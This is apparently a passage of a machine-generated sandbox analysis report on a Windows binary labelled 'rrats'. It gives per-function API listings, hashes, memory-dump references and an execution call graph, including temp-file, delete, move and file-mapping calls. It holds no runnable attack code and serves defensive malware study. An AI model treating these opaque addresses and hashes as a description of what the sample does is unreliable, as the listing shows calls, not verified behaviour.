                                                              • GetLastError.KERNEL32(?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FF6
                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CB0FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 7a64570b1a9e1294a1664f3c4d8c158a7365d22749dbabe9adb3143af6f7e212
                                                              • Instruction ID: 4e2b23dec670c21dd300c55361b6202a102b13f2e39f00fa64d22b79d5a15b0e
                                                              • Opcode Fuzzy Hash: 7a64570b1a9e1294a1664f3c4d8c158a7365d22749dbabe9adb3143af6f7e212
                                                              • Instruction Fuzzy Hash: 73D02E725081613BCA103328AC0AEAF7A04AB22335F680716F639622F2CA244A916292
                                                              Function 00CAE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00CADA55,?), ref: 00CAE2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CADA55,?), ref: 00CAE2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 911fc5ada35581a7ed4dc20b1be663cebae5a4e9fdf4f43823ebd18b245f9b11
                                                              • Instruction ID: 9d910b4600ea231d9fd5219ed2fac13fb95d12faeda55f20478e2bdf5407bf46
                                                              • Opcode Fuzzy Hash: 911fc5ada35581a7ed4dc20b1be663cebae5a4e9fdf4f43823ebd18b245f9b11
                                                              • Instruction Fuzzy Hash: D7C0123124179166E63037646C0DB47AB585B01B15F05046AB645E92D1DAA5D54086E1

                                                              Execution Graph

                                                              Execution Coverage:12.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:35
                                                              execution_graph 23133 e9dff0 23134 e9dffb 23133->23134 23135 e9e00b 23133->23135 23139 e9e011 23134->23139 23138 e9d758 _free 20 API calls 23138->23135 23140 e9e02a 23139->23140 23141 e9e024 23139->23141 23143 e9d758 _free 20 API calls 23140->23143 23142 e9d758 _free 20 API calls 23141->23142 23142->23140 23144 e9e036 23143->23144 23145 e9d758 _free 20 API calls 23144->23145 23146 e9e041 23145->23146 23147 e9d758 _free 20 API calls 23146->23147 23148 e9e04c 23147->23148 23149 e9d758 _free 20 API calls 23148->23149 23150 e9e057 23149->23150 23151 e9d758 _free 20 API calls 23150->23151 23152 e9e062 23151->23152 23153 e9d758 _free 20 API calls 23152->23153 23154 e9e06d 23153->23154 23155 e9d758 _free 20 API calls 23154->23155 23156 e9e078 23155->23156 23157 e9d758 _free 20 API calls 23156->23157 23158 e9e083 23157->23158 23159 e9d758 _free 20 API calls 23158->23159 23160 e9e091 23159->23160 23165 e9decc 23160->23165 23171 e9ddd8 23165->23171 23167 e9def0 23168 e9df1c 23167->23168 23184 e9de39 23168->23184 23170 e9df40 23170->23138 23172 e9dde4 __FrameHandler3::FrameUnwindToState 23171->23172 23179 e9f5b1 EnterCriticalSection 23172->23179 23174 e9de18 23180 e9de2d 23174->23180 23176 e9de25 _abort 23176->23167 23177 e9ddee 23177->23174 23178 e9d758 _free 20 API calls 23177->23178 23178->23174 23179->23177 23183 e9f601 LeaveCriticalSection 23180->23183 23182 e9de37 23182->23176 23183->23182 23185 e9de45 __FrameHandler3::FrameUnwindToState 23184->23185 23192 e9f5b1 EnterCriticalSection 23185->23192 23187 e9de4f 23193 e9e0ba 23187->23193 23189 e9de62 23197 e9de78 23189->23197 23191 e9de70 _abort 23191->23170 23192->23187 23194 e9e0f0 __fassign 23193->23194 23195 e9e0c9 __fassign 23193->23195 23194->23189 23195->23194 23196 ea14a2 __fassign 20 API calls 23195->23196 23196->23194 23200 e9f601 LeaveCriticalSection 23197->23200 23199 e9de82 23199->23191 23200->23199 22146 e857f3 22147 e85814 22146->22147 22148 e85869 81 API calls 22146->22148 22148->22147 22264 e810f5 22269 e8125b 22264->22269 22266 e810fa 22273 e93d92 22266->22273 22270 e81265 __EH_prolog 22269->22270 22276 e83009 22270->22276 22272 e81271 22272->22266 22282 e93d65 22273->22282 22279 e857a6 22276->22279 22278 e8301c 22278->22272 22280 e85960 81 API calls 22279->22280 22281 e857ba 22280->22281 22281->22278 22283 e93d7b 22282->22283 22284 e93d74 22282->22284 22291 e9d18a 22283->22291 22288 e9d11a 22284->22288 22287 e81104 22289 e9d18a 29 API calls 22288->22289 22290 e9d12c 22289->22290 22290->22287 22294 e9ce91 22291->22294 22297 e9cdc7 22294->22297 22296 e9ceb5 22296->22287 22298 e9cdd3 __FrameHandler3::FrameUnwindToState 22297->22298 22305 e9f5b1 EnterCriticalSection 22298->22305 22300 e9cde1 22306 e9cfd9 22300->22306 22302 e9cdee 22316 e9ce0c 22302->22316 22304 e9cdff _abort 22304->22296 22305->22300 22307 e9cff7 22306->22307 22315 e9cfef _abort 22306->22315 22308 e9d050 22307->22308 22307->22315 22319 ea0933 22307->22319 22310 ea0933 29 API calls 22308->22310 22308->22315 22311 e9d066 22310->22311 22313 e9d758 _free 20 API calls 22311->22313 22312 e9d046 22314 e9d758 _free 20 API calls 22312->22314 22313->22315 22314->22308 22315->22302 22328 e9f601 LeaveCriticalSection 22316->22328 22318 e9ce16 22318->22304 22320 ea093e 22319->22320 22321 ea0957 22320->22321 22322 ea0966 22320->22322 22324 e9da7d __dosmaperr 20 API calls 22321->22324 22323 ea0975 22322->22323 22325 ea3b8f 27 API calls 22322->22325 22326 e9f087 22 API calls 22323->22326 22327 ea095c _abort 22324->22327 22325->22323 22326->22327 22327->22312 22328->22318 19093 e934ce 19094 e9347c 19093->19094 19094->19093 19096 e937b8 19094->19096 19122 e93516 19096->19122 19098 e937c8 19099 e93849 19098->19099 19100 e93825 19098->19100 19103 e938c1 LoadLibraryExA 19099->19103 19104 e93922 19099->19104 19110 e939f0 19099->19110 19113 e93934 19099->19113 19101 e93756 DloadReleaseSectionWriteAccess 8 API calls 19100->19101 19102 e93830 RaiseException 19101->19102 19117 e93a1e 19102->19117 19103->19104 19105 e938d4 GetLastError 19103->19105 19108 e9392d FreeLibrary 19104->19108 19104->19113 19106 e938fd 19105->19106 19114 e938e7 19105->19114 19109 e93756 DloadReleaseSectionWriteAccess 8 API calls 19106->19109 19107 e93992 GetProcAddress 19107->19110 19111 e939a2 GetLastError 19107->19111 19108->19113 19115 e93908 RaiseException 19109->19115 19133 e93756 19110->19133 19116 e939b5 19111->19116 19113->19107 19113->19110 19114->19104 19114->19106 19115->19117 19116->19110 19118 e93756 DloadReleaseSectionWriteAccess 8 API calls 19116->19118 19117->19094 19119 e939d6 RaiseException 19118->19119 19120 e93516 DloadAcquireSectionWriteAccess 8 API calls 19119->19120 19121 e939ed 19120->19121 19121->19110 19123 e93548 19122->19123 19124 e93522 19122->19124 19123->19098 19141 e935bf 19124->19141 19126 e93527 19127 e93543 19126->19127 19146 e936e8 19126->19146 19151 e93549 19127->19151 19131 e937ad 19131->19098 19132 e937a9 RtlReleaseSRWLockExclusive 19132->19098 19134 e93768 19133->19134 19135 e9378a 19133->19135 19136 e935bf DloadAcquireSectionWriteAccess 4 API calls 19134->19136 19135->19117 19138 e9376d 19136->19138 19137 e93785 19161 e9378c 19137->19161 19138->19137 19139 e936e8 DloadProtectSection 3 API calls 19138->19139 19139->19137 19142 e93549 DloadAcquireSectionWriteAccess 3 API calls 19141->19142 19143 e935c4 19142->19143 19144 e935dc RtlAcquireSRWLockExclusive 19143->19144 19145 e935e0 19143->19145 19144->19126 19145->19126 19149 e936fd DloadProtectSection 19146->19149 19147 e93703 19147->19127 19148 e93738 VirtualProtect 19148->19147 19149->19147 19149->19148 19157 e935fe VirtualQuery 19149->19157 19152 e93557 19151->19152 19154 e9356c 19151->19154 19153 e9355b GetModuleHandleW 19152->19153 19152->19154 19153->19154 19155 e93570 GetProcAddress 19153->19155 19154->19131 19154->19132 19155->19154 19156 e93580 GetProcAddress 19155->19156 19156->19154 19158 e93619 19157->19158 19159 e9365b 19158->19159 19160 e93624 GetSystemInfo 19158->19160 19159->19148 19160->19159 19162 e93549 DloadAcquireSectionWriteAccess 3 API calls 19161->19162 19163 e93791 19162->19163 19164 e937ad 19163->19164 19165 e937a9 RtlReleaseSRWLockExclusive 19163->19165 19164->19135 19165->19135 23210 e9edc0 23220 ea3757 23210->23220 23214 e9edcd 23233 ea3838 23214->23233 23217 e9edf7 23218 e9d758 _free 20 API calls 23217->23218 23219 e9ee02 23218->23219 23237 ea3760 23220->23237 23222 e9edc8 23223 ea360a 23222->23223 23224 ea3616 __FrameHandler3::FrameUnwindToState 23223->23224 23257 e9f5b1 EnterCriticalSection 23224->23257 23226 ea368c 23271 ea36a1 23226->23271 23227 ea3621 23227->23226 23229 ea3660 DeleteCriticalSection 23227->23229 23258 ea49b3 23227->23258 23232 e9d758 _free 20 API calls 23229->23232 23230 ea3698 _abort 23230->23214 23232->23227 23234 ea384e 23233->23234 23236 e9eddc DeleteCriticalSection 23233->23236 23235 e9d758 _free 20 API calls 23234->23235 23234->23236 23235->23236 23236->23214 23236->23217 23238 ea376c __FrameHandler3::FrameUnwindToState 23237->23238 23247 e9f5b1 EnterCriticalSection 23238->23247 23240 ea380f 23252 ea382f 23240->23252 23243 ea377b 23243->23240 23246 ea3710 66 API calls 23243->23246 23248 e9ee0c EnterCriticalSection 23243->23248 23249 ea3805 23243->23249 23244 ea381b _abort 23244->23222 23246->23243 23247->23243 23248->23243 23255 e9ee20 LeaveCriticalSection 23249->23255 23251 ea380d 23251->23243 23256 e9f601 LeaveCriticalSection 23252->23256 23254 ea3836 23254->23244 23255->23251 23256->23254 23257->23227 23259 ea49bf __FrameHandler3::FrameUnwindToState 23258->23259 23260 ea49d0 23259->23260 23261 ea49e5 23259->23261 23262 e9da7d __dosmaperr 20 API calls 23260->23262 23270 ea49e0 _abort 23261->23270 23274 e9ee0c EnterCriticalSection 23261->23274 23264 ea49d5 23262->23264 23266 e9d95c ___std_exception_copy 26 API calls 23264->23266 23265 ea4a01 23275 ea493d 23265->23275 23266->23270 23268 ea4a0c 23291 ea4a29 23268->23291 23270->23227 23534 e9f601 LeaveCriticalSection 23271->23534 23273 ea36a8 23273->23230 23274->23265 23276 ea494a 23275->23276 23278 ea495f 23275->23278 23277 e9da7d __dosmaperr 20 API calls 23276->23277 23280 ea494f 23277->23280 23283 ea495a 23278->23283 23294 ea36aa 23278->23294 23282 e9d95c ___std_exception_copy 26 API calls 23280->23282 23282->23283 23283->23268 23284 ea3838 20 API calls 23285 ea497b 23284->23285 23300 e9ecc9 23285->23300 23287 ea4981 23307 ea4c7b 23287->23307 23290 e9d758 _free 20 API calls 23290->23283 23533 e9ee20 LeaveCriticalSection 23291->23533 23293 ea4a31 23293->23270 23295 ea36c2 23294->23295 23296 ea36be 23294->23296 23295->23296 23297 e9ecc9 26 API calls 23295->23297 23296->23284 23298 ea36e2 23297->23298 23322 ea45ad 23298->23322 23301 e9ecea 23300->23301 23302 e9ecd5 23300->23302 23301->23287 23303 e9da7d __dosmaperr 20 API calls 23302->23303 23304 e9ecda 23303->23304 23305 e9d95c ___std_exception_copy 26 API calls 23304->23305 23306 e9ece5 23305->23306 23306->23287 23308 ea4c8a 23307->23308 23309 ea4c9f 23307->23309 23310 e9da6a __dosmaperr 20 API calls 23308->23310 23311 ea4cda 23309->23311 23316 ea4cc6 23309->23316 23313 ea4c8f 23310->23313 23312 e9da6a __dosmaperr 20 API calls 23311->23312 23314 ea4cdf 23312->23314 23315 e9da7d __dosmaperr 20 API calls 23313->23315 23317 e9da7d __dosmaperr 20 API calls 23314->23317 23320 ea4987 23315->23320 23490 ea4c53 23316->23490 23319 ea4ce7 23317->23319 23321 e9d95c ___std_exception_copy 26 API calls 23319->23321 23320->23283 23320->23290 23321->23320 23323 ea45b9 __FrameHandler3::FrameUnwindToState 23322->23323 23324 ea45d9 23323->23324 23325 ea45c1 23323->23325 23326 ea4677 23324->23326 23331 ea460e 23324->23331 23347 e9da6a 23325->23347 23329 e9da6a __dosmaperr 20 API calls 23326->23329 23332 ea467c 23329->23332 23330 e9da7d __dosmaperr 20 API calls 23333 ea45ce _abort 23330->23333 23350 ea0f40 EnterCriticalSection 23331->23350 23335 e9da7d __dosmaperr 20 API calls 23332->23335 23333->23296 23337 ea4684 23335->23337 23336 ea4614 23338 ea4630 23336->23338 23339 ea4645 23336->23339 23340 e9d95c ___std_exception_copy 26 API calls 23337->23340 23341 e9da7d __dosmaperr 20 API calls 23338->23341 23351 ea4698 23339->23351 23340->23333 23343 ea4635 23341->23343 23345 e9da6a __dosmaperr 20 API calls 23343->23345 23344 ea4640 23402 ea466f 23344->23402 23345->23344 23348 e9e189 _abort 20 API calls 23347->23348 23349 e9da6f 23348->23349 23349->23330 23350->23336 23352 ea46c6 23351->23352 23389 ea46bf 23351->23389 23353 ea46ca 23352->23353 23354 ea46e9 23352->23354 23355 e9da6a __dosmaperr 20 API calls 23353->23355 23359 ea473a 23354->23359 23360 ea471d 23354->23360 23358 ea46cf 23355->23358 23356 e9494c _ValidateLocalCookies 5 API calls 23357 ea48a0 23356->23357 23357->23344 23362 e9da7d __dosmaperr 20 API calls 23358->23362 23369 ea4750 23359->23369 23405 ea4922 23359->23405 23361 e9da6a __dosmaperr 20 API calls 23360->23361 23363 ea4722 23361->23363 23364 ea46d6 23362->23364 23367 e9da7d __dosmaperr 20 API calls 23363->23367 23368 e9d95c ___std_exception_copy 26 API calls 23364->23368 23371 ea472a 23367->23371 23368->23389 23408 ea423d 23369->23408 23374 e9d95c ___std_exception_copy 26 API calls 23371->23374 23372 ea475e 23377 ea4762 23372->23377 23378 ea4784 23372->23378 23373 ea4797 23375 ea47ab 23373->23375 23376 ea47f1 WriteFile 23373->23376 23374->23389 23382 ea47b3 23375->23382 23383 ea47e1 23375->23383 23380 ea4814 GetLastError 23376->23380 23386 ea477a 23376->23386 23379 ea4858 23377->23379 23415 ea41d0 23377->23415 23420 ea401d GetConsoleCP 23378->23420 23379->23389 23390 e9da7d __dosmaperr 20 API calls 23379->23390 23380->23386 23387 ea47b8 23382->23387 23388 ea47d1 23382->23388 23446 ea42b3 23383->23446 23386->23379 23386->23389 23393 ea4834 23386->23393 23387->23379 23431 ea4392 23387->23431 23438 ea4480 23388->23438 23389->23356 23392 ea487d 23390->23392 23395 e9da6a __dosmaperr 20 API calls 23392->23395 23396 ea483b 23393->23396 23397 ea484f 23393->23397 23395->23389 23399 e9da7d __dosmaperr 20 API calls 23396->23399 23453 e9da47 23397->23453 23400 ea4840 23399->23400 23401 e9da6a __dosmaperr 20 API calls 23400->23401 23401->23389 23489 ea0f63 LeaveCriticalSection 23402->23489 23404 ea4675 23404->23333 23458 ea48a4 23405->23458 23480 ea3876 23408->23480 23410 ea424d 23411 ea4252 23410->23411 23412 e9e105 _abort 38 API calls 23410->23412 23411->23372 23411->23373 23413 ea4275 23412->23413 23413->23411 23414 ea4293 GetConsoleMode 23413->23414 23414->23411 23416 ea422a 23415->23416 23419 ea41f5 23415->23419 23416->23386 23417 ea5d84 WriteConsoleW CreateFileW 23417->23419 23418 ea422c GetLastError 23418->23416 23419->23416 23419->23417 23419->23418 23425 ea4192 23420->23425 23429 ea4080 23420->23429 23421 e9494c _ValidateLocalCookies 5 API calls 23422 ea41cc 23421->23422 23422->23386 23423 e9f0f0 __vsnwprintf_l 38 API calls 23423->23429 23424 e9dc30 40 API calls __fassign 23424->23429 23425->23421 23426 ea4106 WideCharToMultiByte 23426->23425 23427 ea412c WriteFile 23426->23427 23428 ea41b5 GetLastError 23427->23428 23427->23429 23428->23425 23429->23423 23429->23424 23429->23425 23429->23426 23430 ea415d WriteFile 23429->23430 23430->23428 23430->23429 23435 ea43a1 23431->23435 23432 ea4463 23434 e9494c _ValidateLocalCookies 5 API calls 23432->23434 23433 ea441f WriteFile 23433->23435 23436 ea4465 GetLastError 23433->23436 23437 ea447c 23434->23437 23435->23432 23435->23433 23436->23432 23437->23386 23445 ea448f 23438->23445 23439 ea459a 23440 e9494c _ValidateLocalCookies 5 API calls 23439->23440 23441 ea45a9 23440->23441 23441->23386 23442 ea4511 WideCharToMultiByte 23443 ea4592 GetLastError 23442->23443 23444 ea4546 WriteFile 23442->23444 23443->23439 23444->23443 23444->23445 23445->23439 23445->23442 23445->23444 23450 ea42c2 23446->23450 23447 ea4375 23449 e9494c _ValidateLocalCookies 5 API calls 23447->23449 23448 ea4334 WriteFile 23448->23450 23451 ea4377 GetLastError 23448->23451 23452 ea438e 23449->23452 23450->23447 23450->23448 23451->23447 23452->23386 23454 e9da6a __dosmaperr 20 API calls 23453->23454 23455 e9da52 __dosmaperr 23454->23455 23456 e9da7d __dosmaperr 20 API calls 23455->23456 23457 e9da65 23456->23457 23457->23389 23467 ea1017 23458->23467 23460 ea48b6 23461 ea48be 23460->23461 23462 ea48cf SetFilePointerEx 23460->23462 23463 e9da7d __dosmaperr 20 API calls 23461->23463 23464 ea48e7 GetLastError 23462->23464 23465 ea48c3 23462->23465 23463->23465 23466 e9da47 __dosmaperr 20 API calls 23464->23466 23465->23369 23466->23465 23468 ea1039 23467->23468 23469 ea1024 23467->23469 23472 e9da6a __dosmaperr 20 API calls 23468->23472 23474 ea105e 23468->23474 23470 e9da6a __dosmaperr 20 API calls 23469->23470 23471 ea1029 23470->23471 23473 e9da7d __dosmaperr 20 API calls 23471->23473 23475 ea1069 23472->23475 23476 ea1031 23473->23476 23474->23460 23477 e9da7d __dosmaperr 20 API calls 23475->23477 23476->23460 23478 ea1071 23477->23478 23479 e9d95c ___std_exception_copy 26 API calls 23478->23479 23479->23476 23481 ea3883 23480->23481 23482 ea3890 23480->23482 23483 e9da7d __dosmaperr 20 API calls 23481->23483 23484 ea389c 23482->23484 23485 e9da7d __dosmaperr 20 API calls 23482->23485 23486 ea3888 23483->23486 23484->23410 23487 ea38bd 23485->23487 23486->23410 23488 e9d95c ___std_exception_copy 26 API calls 23487->23488 23488->23486 23489->23404 23493 ea4bd1 23490->23493 23492 ea4c77 23492->23320 23494 ea4bdd __FrameHandler3::FrameUnwindToState 23493->23494 23504 ea0f40 EnterCriticalSection 23494->23504 23496 ea4beb 23497 ea4c1d 23496->23497 23498 ea4c12 23496->23498 23500 e9da7d __dosmaperr 20 API calls 23497->23500 23505 ea4cfa 23498->23505 23501 ea4c18 23500->23501 23520 ea4c47 23501->23520 23503 ea4c3a _abort 23503->23492 23504->23496 23506 ea1017 26 API calls 23505->23506 23508 ea4d0a 23506->23508 23507 ea4d10 23523 ea0f86 23507->23523 23508->23507 23510 ea1017 26 API calls 23508->23510 23518 ea4d42 23508->23518 23513 ea4d39 23510->23513 23511 ea1017 26 API calls 23514 ea4d4e CloseHandle 23511->23514 23515 ea1017 26 API calls 23513->23515 23514->23507 23516 ea4d5a GetLastError 23514->23516 23515->23518 23516->23507 23517 e9da47 __dosmaperr 20 API calls 23519 ea4d8a 23517->23519 23518->23507 23518->23511 23519->23501 23532 ea0f63 LeaveCriticalSection 23520->23532 23522 ea4c51 23522->23503 23524 ea0ffc 23523->23524 23525 ea0f95 23523->23525 23526 e9da7d __dosmaperr 20 API calls 23524->23526 23525->23524 23529 ea0fbf 23525->23529 23527 ea1001 23526->23527 23528 e9da6a __dosmaperr 20 API calls 23527->23528 23530 ea0fec 23528->23530 23529->23530 23531 ea0fe6 SetStdHandle 23529->23531 23530->23517 23530->23519 23531->23530 23532->23522 23533->23293 23534->23273 20983 e91ec5 20984 e91ece GetTempPathW 20983->20984 21001 e917d1 _wcslen _wcsrchr 20983->21001 20989 e91eee 20984->20989 20986 e839a9 _swprintf 51 API calls 20986->20989 20987 e92448 20989->20986 20990 e91f25 SetDlgItemTextW 20989->20990 21014 e82680 20989->21014 20993 e91f42 _wcschr 20990->20993 20990->21001 20992 e91aa5 SetWindowTextW 20992->21001 20996 e92028 EndDialog 20993->20996 20993->21001 20996->21001 20998 e91893 SetFileAttributesW 21000 e9194d GetFileAttributesW 20998->21000 21011 e918ad _abort _wcslen 20998->21011 21000->21001 21003 e9195f DeleteFileW 21000->21003 21001->20987 21001->20992 21001->20998 21004 e91c6f GetDlgItem SetWindowTextW SendMessageW 21001->21004 21008 e91caf SendMessageW 21001->21008 21013 e87d24 CompareStringW 21001->21013 21017 e90354 21001->21017 21021 e8f86d GetCurrentDirectoryW 21001->21021 21026 e82a2f 21001->21026 21030 e829b8 21001->21030 21033 e904ce 21001->21033 21003->21001 21005 e91970 21003->21005 21004->21001 21006 e839a9 _swprintf 51 API calls 21005->21006 21007 e91990 GetFileAttributesW 21006->21007 21007->21005 21009 e919a5 MoveFileW 21007->21009 21008->21001 21009->21001 21010 e919bd MoveFileExW 21009->21010 21010->21001 21011->21001 21012 e91929 SHFileOperationW 21011->21012 21022 e83470 21011->21022 21012->21000 21013->21001 21039 e82692 21014->21039 21018 e9035e 21017->21018 21019 e90430 ExpandEnvironmentStringsW 21018->21019 21020 e9044d 21018->21020 21019->21020 21020->21001 21021->21001 21023 e83485 21022->21023 21024 e839a9 _swprintf 51 API calls 21023->21024 21025 e8349c _wcslen _wcschr 21023->21025 21024->21025 21025->21011 21028 e82a3d 21026->21028 21027 e82af9 6 API calls 21027->21028 21028->21027 21029 e82ad0 21028->21029 21029->21001 21031 e829ca 21030->21031 21032 e829c3 FindClose 21030->21032 21031->21001 21032->21031 21034 e904d8 ___std_exception_copy 21033->21034 21035 e8180a 75 API calls 21034->21035 21038 e904f7 _wcslen 21034->21038 21035->21038 21036 e90354 ExpandEnvironmentStringsW 21036->21038 21037 e90599 21037->21001 21038->21036 21038->21037 21040 e93ac0 21039->21040 21041 e8269f GetFileAttributesW 21040->21041 21042 e826b0 21041->21042 21043 e82689 21041->21043 21044 e83553 GetCurrentDirectoryW 21042->21044 21043->20989 21045 e826c4 21044->21045 21045->21043 21046 e826c8 GetFileAttributesW 21045->21046 21046->21043 22355 e9d4d0 22356 e9d4dc __FrameHandler3::FrameUnwindToState 22355->22356 22357 e9d513 _abort 22356->22357 22363 e9f5b1 EnterCriticalSection 22356->22363 22359 e9d4f0 22360 ea1766 __fassign 20 API calls 22359->22360 22361 e9d500 22360->22361 22364 e9d519 22361->22364 22363->22359 22367 e9f601 LeaveCriticalSection 22364->22367 22366 e9d520 22366->22357 22367->22366 22139 e934d3 22140 e937b8 ___delayLoadHelper2@8 17 API calls 22139->22140 22141 e934e0 22140->22141 23614 ea09d1 23615 ea09f7 23614->23615 23618 ea09f3 23614->23618 23615->23618 23619 e9efc0 31 API calls 23615->23619 23616 e9494c _ValidateLocalCookies 5 API calls 23617 ea0a59 23616->23617 23618->23616 23619->23615 23632 e931ab 23633 e931b5 23632->23633 23634 e937b8 ___delayLoadHelper2@8 17 API calls 23633->23634 23634->23633 19166 e940a2 19167 e940ae __FrameHandler3::FrameUnwindToState 19166->19167 19198 e93bcc 19167->19198 19169 e940b5 19170 e94208 19169->19170 19173 e940df 19169->19173 19296 e94561 IsProcessorFeaturePresent 19170->19296 19172 e9420f 19263 e9c89d 19172->19263 19182 e9411e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 19173->19182 19266 e9d43d 19173->19266 19180 e940fe 19188 e9417f 19182->19188 19274 e9c865 19182->19274 19209 e9467c 19188->19209 19199 e93bd5 19198->19199 19303 e9437d IsProcessorFeaturePresent 19199->19303 19203 e93be6 19208 e93bea 19203->19208 19313 e9d2c7 19203->19313 19205 e93c01 19205->19169 19208->19169 19580 e94bd0 19209->19580 19212 e94185 19213 e9d38e 19212->19213 19582 ea04b0 19213->19582 19215 e9418d 19218 e92ef8 19215->19218 19216 e9d397 19216->19215 19586 ea083b 19216->19586 19961 e86b8f 19218->19961 19222 e92f17 20010 e8fe36 19222->20010 19224 e92f20 _abort 19225 e92f33 GetCommandLineW 19224->19225 19226 e92fc0 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 19225->19226 19227 e92f42 19225->19227 20014 e839a9 19226->20014 20055 e91604 19227->20055 19233 e92fba 19235 e92bf6 2 API calls 19233->19235 19234 e92f50 OpenFileMappingW 19237 e92f69 MapViewOfFile 19234->19237 19238 e92fb0 CloseHandle 19234->19238 19235->19226 19240 e92f7a __InternalCxxFrameHandler 19237->19240 19241 e92fa7 UnmapViewOfFile 19237->19241 19238->19226 20060 e92bf6 19240->20060 19241->19238 20894 e9c61a 19263->20894 19269 e9d454 19266->19269 19267 e9494c _ValidateLocalCookies 5 API calls 19268 e940f8 19267->19268 19268->19180 19270 e9d3e1 19268->19270 19269->19267 19272 e9d410 19270->19272 19271 e9494c _ValidateLocalCookies 5 API calls 19273 e9d439 19271->19273 19272->19271 19273->19182 19275 e9c88d _abort 19274->19275 19276 e9d5bf _abort 19274->19276 19275->19188 19277 e9e105 _abort 38 API calls 19276->19277 19279 e9d5d0 19277->19279 19278 e9d6b0 _abort 38 API calls 19280 e9d5fa 19278->19280 19279->19278 19281 e9da7d __dosmaperr 20 API calls 19280->19281 19284 e9d639 19280->19284 19282 e9d62f 19281->19282 19283 e9d95c ___std_exception_copy 26 API calls 19282->19283 19283->19284 19284->19188 19297 e94577 _abort 19296->19297 19298 e94622 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19297->19298 19299 e9466d _abort 19298->19299 19299->19172 19300 e9c84f 19301 e9c61a _abort 28 API calls 19300->19301 19302 e9421d 19301->19302 19304 e93be1 19303->19304 19305 e971b1 19304->19305 19322 e9831c 19305->19322 19309 e971cd 19309->19203 19310 e971c2 19310->19309 19336 e98358 19310->19336 19312 e971ba 19312->19203 19379 ea09da 19313->19379 19316 e971d0 19317 e971d9 19316->19317 19318 e971e3 19316->19318 19319 e9753f ___vcrt_uninitialize_ptd 6 API calls 19317->19319 19318->19208 19320 e971de 19319->19320 19321 e98358 ___vcrt_uninitialize_locks DeleteCriticalSection 19320->19321 19321->19318 19323 e98325 19322->19323 19325 e9834e 19323->19325 19326 e971b6 19323->19326 19340 e986cb 19323->19340 19327 e98358 ___vcrt_uninitialize_locks DeleteCriticalSection 19325->19327 19326->19312 19328 e9750c 19326->19328 19327->19326 19360 e985dc 19328->19360 19333 e9753c 19333->19310 19335 e97521 19335->19310 19337 e98382 19336->19337 19338 e98363 19336->19338 19337->19312 19339 e9836d DeleteCriticalSection 19338->19339 19339->19337 19339->19339 19345 e98592 19340->19345 19343 e98703 InitializeCriticalSectionAndSpinCount 19344 e986ee 19343->19344 19344->19323 19346 e985ab 19345->19346 19347 e985d4 19345->19347 19346->19347 19352 e984f7 19346->19352 19347->19343 19347->19344 19350 e985c0 GetProcAddress 19350->19347 19351 e985ce 19350->19351 19351->19347 19357 e98503 ___vcrt_InitializeCriticalSectionEx 19352->19357 19353 e98578 19353->19347 19353->19350 19354 e9851a LoadLibraryExW 19355 e98538 GetLastError 19354->19355 19356 e9857f 19354->19356 19355->19357 19356->19353 19358 e98587 FreeLibrary 19356->19358 19357->19353 19357->19354 19359 e9855a LoadLibraryExW 19357->19359 19358->19353 19359->19356 19359->19357 19361 e98592 ___vcrt_InitializeCriticalSectionEx 5 API calls 19360->19361 19362 e985f6 19361->19362 19363 e9860f TlsAlloc 19362->19363 19364 e97516 19362->19364 19364->19335 19365 e9868d 19364->19365 19366 e98592 ___vcrt_InitializeCriticalSectionEx 5 API calls 19365->19366 19367 e986a7 19366->19367 19368 e986c2 TlsSetValue 19367->19368 19369 e9752f 19367->19369 19368->19369 19369->19333 19370 e9753f 19369->19370 19371 e97549 19370->19371 19372 e9754f 19370->19372 